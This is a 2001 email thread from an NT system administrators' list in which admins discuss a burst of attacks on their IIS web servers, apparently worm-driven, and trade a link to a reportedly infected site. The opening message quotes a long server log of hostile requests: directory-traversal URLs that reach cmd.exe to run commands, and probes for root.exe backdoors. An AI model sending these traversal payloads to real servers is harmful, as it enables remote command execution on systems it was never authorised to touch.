RE: WARNING: Hacker Alert

Wed, 19 Sep 2001 12:17:59 -0700

Title: RE: WARNING: Hacker Alert

I am not sure. I usually wasn't in that partition. I have been running XP for quite a while now and generally stay  there. I had not been taking care of my W2K OS. The more I think about it, I think that I caused the problem. I was at work and when the site started hitting my hard drive I reached over and killed the power on my box for fear of sending mass emails, etc. I may have corrupted a system file when I did that. I have not heard of any other reports similiar to mine.

-----Original Message-----
From: higginspi [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 2:09 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


Shannon -- What version and SP did you have of
Internet Explorer?

Higgins

-----Original Message-----
From: Shannon Speck [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 2:38 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


I, like a dumbass went to this site and it fried some
windows files and my pc wouldn't boot after that.
Luckily I dual boot two NTFS partitions so I was able
to come back up under XP and get all my data back.
Still had to reformat the W2k partition. Re-install
didn't work. Oh well, live and learn.

-----Original Message-----
From: David B. Lunn [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:34 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



Why would you put a link to an infected site?  If
someone does not have
sept 18th patterns????  They will immediately be
infected??? 

-----Original Message-----
From: Martin Blackstone
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



Here is a site that has been hit
http://216.39.178.32

-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



CodeRed seems to have dwindled to nothing on my logs.
But it's being
replaced with the EXACT same lines you have below, and
they stay
consistent with the code red 2 methods of attacking
the more local
subnets.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]



-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert



Yes. It seems to be systems I have previously
monitored hitting me with
codered attacks. I bet someone is activating all of
their children.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]



-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert



All my public facing web servers at home and at my
office have shown a
huge continuous hacking activity. Has anyone seen
similar? I fear this
may be code red related or automated. Please comment
if you have seen
similar. Here is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe

, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 97,
604, 404, 3, GET,
/scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe,
/c+dir, 63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0,
97, 604, 404, 3,
GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01,
10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404,
3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -,
9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -,
9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -,
9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01,
x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe,
/c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80,
604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4,
DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4,
DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe

, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4,
DC1DIIS01, x.x.x.x, 15,
97, 604, 404, 3, GET,
/scripts/..�../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4,
DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -,
9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604,
404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -,
9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -,
9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET,
/scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01,
10:37:22, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET,
/MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -,
9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:28,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -,
9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe

, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.114.34.130, -, 9/18/01,
10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404,
3, GET,
/MSADC/root.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:37, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/c/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4,
DC1DIIS01, x.x.x.x,
0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe

, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4,
DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET,
/scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4,
DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe,
/c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4,
DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -,
9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172,
41, 13973, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.114.34.130, -,
9/18/01, 10:39:45,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -,
9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Confidential:  This e-mail and any files transmitted
with it are the
property of Lanco International and/or its affiliates,
are confidential,
and are intended solely for the use of the individual
or entity to whom
this e-mail is addressed. If you are not one of the
named recipient(s)
or otherwise have reason to believe that you have
received this message
in error, please notify the sender at the above e-mail
address and
delete this message immediately from your computer.
Any other use,
retention, dissemination, forwarding, printing or
copying of this e-mail
is strictly prohibited.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Confidential:  This e-mail and any files transmitted
with it are the
property of Lanco International and/or its affiliates,
are confidential,
and are intended solely for the use of the individual
or entity to whom
this e-mail is addressed. If you are not one of the
named recipient(s)
or otherwise have reason to believe that you have
received this message
in error, please notify the sender at the above e-mail
address and
delete this message immediately from your computer.
Any other use,
retention, dissemination, forwarding, printing or
copying of this e-mail
is strictly prohibited.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


__________________________________________________
Terrorist Attacks on U.S. - How can you help?
Donate cash, emergency relief information
http://dailynews.yahoo.com/fc/US/Emergency_Information/

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Reply via email to